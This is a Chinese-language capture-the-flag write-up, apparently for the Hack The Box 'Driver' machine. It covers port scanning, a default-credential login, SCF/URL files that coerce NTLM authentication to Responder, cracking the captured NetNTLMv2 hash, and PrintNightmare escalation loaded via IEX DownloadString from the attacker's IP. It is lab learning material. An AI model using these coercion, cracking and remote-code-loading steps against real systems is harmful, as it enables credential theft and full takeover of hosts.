└─\# nmap 10.10.11.106 --min-rate=1000 -p- -Pn -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2021\-11-06 04:09 EDT
Nmap scan report for loaclhost (10.10.11.106)
Host is up (0.36s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 \- 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) /winrm
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.54 seconds
看到445,永恒之蓝搞一下没有
nmap \--script\=smb\* 10.10.11.106 \-p 445 \-Pn
也没什么东西。
尝试访问80有个401认证。admin:admin 密码进去了
有一个文件上传没什么反应,找不到上传的文件。尝试对时间戳进行爆破跑了一万次不行。
扫下5985 端口,有一个奇怪的目录 。网上搜一下wsman,发现wsman是winrm(Windows Remote Management)的一个接口。可以使用evil-winrm进行远程连接管理。
\[04:42:27\] 403 \- 312B \- /%2e%2e//google.com
\[04:43:25\] 403 \- 312B \- /\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd
\[04:46:54\] 405 \- 0B \- /wsman
盲猜可能是打印机漏洞。搞了好多天。。。。。
搞到这里其实心态有点崩。菜狗如我。。
好多天过去了。
某天听到师傅分享一个内网渗透的案例。讲的是通过欺骗服务器,强制 NTLM 认证。好好学了一下,刚好符合这个攻击场景:
一个文件上传
一个smb
发现这些攻击场景下有两个比较简单。通过执行.SCF 文件执行,当用户打开存放该文件的目录或着刷新时,SCF就会自动执行,自动解析图标中的链接。迫使受害系统尝试在 Responder 正在侦听的 10.10.14.37 处对攻击系统进行 NTLM 身份验证。也可以把该文件放在共享目录上,用户打开该共享目录时,就会进行强制认证。
还需要一个工具Responder。启动默认功能即可python3 Responder.py -I tun0 -wrf
盲测发现成功了,经过测试发现以下两种方法皆可。
\[Shell\]Command=2
IconFile=\\\\10.10.14.37\\favicon.ico
\[Taskbar\]
Command=HEHE
`[InternetShortcut]``URL=whatever``WorkingDirectory=whatever``IconFile=\\10.10.14.37\favicon.ico``IconIndex=1`
成功获取目标服务器的NTLM v2 凭证。如下所示:
\[SMB\] NTLMv2-SSP Client : 10.10.11.106
\[SMB\] NTLMv2-SSP Username : DRIVER\\tony
\[SMB\] NTLMv2-SSP Hash : tony::DRIVER:95fe96496a0c8df4:31E500CBE2425702355E50C0A37E9539:010100000000000080C97FE5E0E1D70101011E11164949B700000000020008004E0050003700460001001E00570049004E002D0045003300530050004C0055003000360037004400480004003400570049004E002D0045003300530050004C005500300036003700440048002E004E005000370046002E004C004F00430041004C00030014004E005000370046002E004C004F00430041004C00050014004E005000370046002E004C004F00430041004C000700080080C97FE5E0E1D70106000400020000000800300030000000000000000000000000200000A95499C91BED630380B9EAB1B1353F108C2085C2711A7E9036E8848F35CB1D780A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0033003700000000000000000000000000
这个v2凭证不能用来PTH,但是可以通过这个配合字典来破解出用户的明文密码,此凭证放在logs文件夹中和Responder.db中。
这时候可以爆破
hashcat
└─# hashcat -h |grep NT
5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols
5600 | NetNTLMv2 | Network Protocols
1000 | NTLM | Operating System
所以爆破命令为
hashcat -m 5600 pass.txt /usr/share/wordlists/rockyou.txt --force
TONY::DRIVER:1122334455667788:e8f3b3ecc7071c6c9c6b7e23dce15416:0101000000000000567397034cc0d701b4813f5b78758a070000000002000a0073006d006200310032000100140053004500520056004500520032003000300038000400160073006d006200310032002e006c006f00630061006c0003002c0053004500520056004500520032003000300038002e0073006d006200310032002e006c006f00630061006c000500160073006d006200310032002e006c006f00630061006c0008003000300000000000000000000000002000008c2742491911a054253d45c2742410216294cfc650c01e57cf656f269f77106c0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320031000000000000000000:liltony
使用john
└─\# john pass.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R \[MD4 HMAC-MD5 32/64\])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
liltony (tony)
1g 0:00:01:19 DONE 3/3 (2021-11-25 10:11) 0.01258g/s 1986Kp/s 1986Kc/s 1986KC/s labzter..lilthi1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
使用evil-winrm登录
evil-winrm \-i 10.10.11.106 \-u tony \-p liltony
\*Evil-WinRM\* PS C:\\Users\\tony\\Documents\> whoami
driver\\tony
在桌面找到了user.txt
\*Evil-WinRM\* PS C:\\Users\\tony\\Desktop\> dir
Directory: C:\\Users\\tony\\Desktop
Mode LastWriteTime Length Name
\---- \------------- \------ \----
\-ar\--- 11/25/2021 4:33 AM 34 user.txt
\*Evil-WinRM\* PS C:\\Users\\tony\\Desktop\> cat user.txt
714601e46470d5dabda05f09b8bc0e5c
\*Evil-WinRM\* PS C:\\Users\\tony\\Desktop\> net user
User accounts for \\\\
\-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
tony
The command completed with one or more errors.
尝试一些命令,发现这并不是一个cmd.exe而是一个powershell
\*Evil-WinRM\* PS C:\\Users\\tony\\Desktop\> $PSVersionTable.PSVersion
Major Minor Build Revision
\----- \----- \----- \--------
5 0 10240 17146
版本还是5,这个版本的服务器版本比较新。几乎和我的服务器差不多
之前打web以为是打印机漏洞,搜索发现最近报错了一个打印机漏洞CVE-2021-1675利用条件是开启这个服务。
使用Powershell下的信息收集,发现也有这个服务。
github上有很多提权脚本,有python、exe、powershell版本
当前情况比较适合powershell的利用。https://github.com/calebstewart/CVE-2021-1675
在kali桌面用python开启一个http服务。
python3 -m http.server 80
远程加载脚本:
IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.37/CVE-2021-1675.ps1")
Invoke-Nightmare -DriverName "DRIVER" -NewUser "carnival" -NewPassword "carnival.com"
runas /user:carnival powershell.exe
发现无法执行。。。
用新加的管理员账户连一下。
evil-winrm -i 10.10.11.106 -u carnival -p carnival.com
查看管理员权限:
大佬提示说,上传点会不断进行文件读取!!!
`Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.``#以我英语水平翻译不出来。留下了泪水``选择打印机模型,并上传相应固件更新到我们的文件共享。我们的测试团队将手动审查上传,并很快启动测试`
喜欢就请关注我们吧!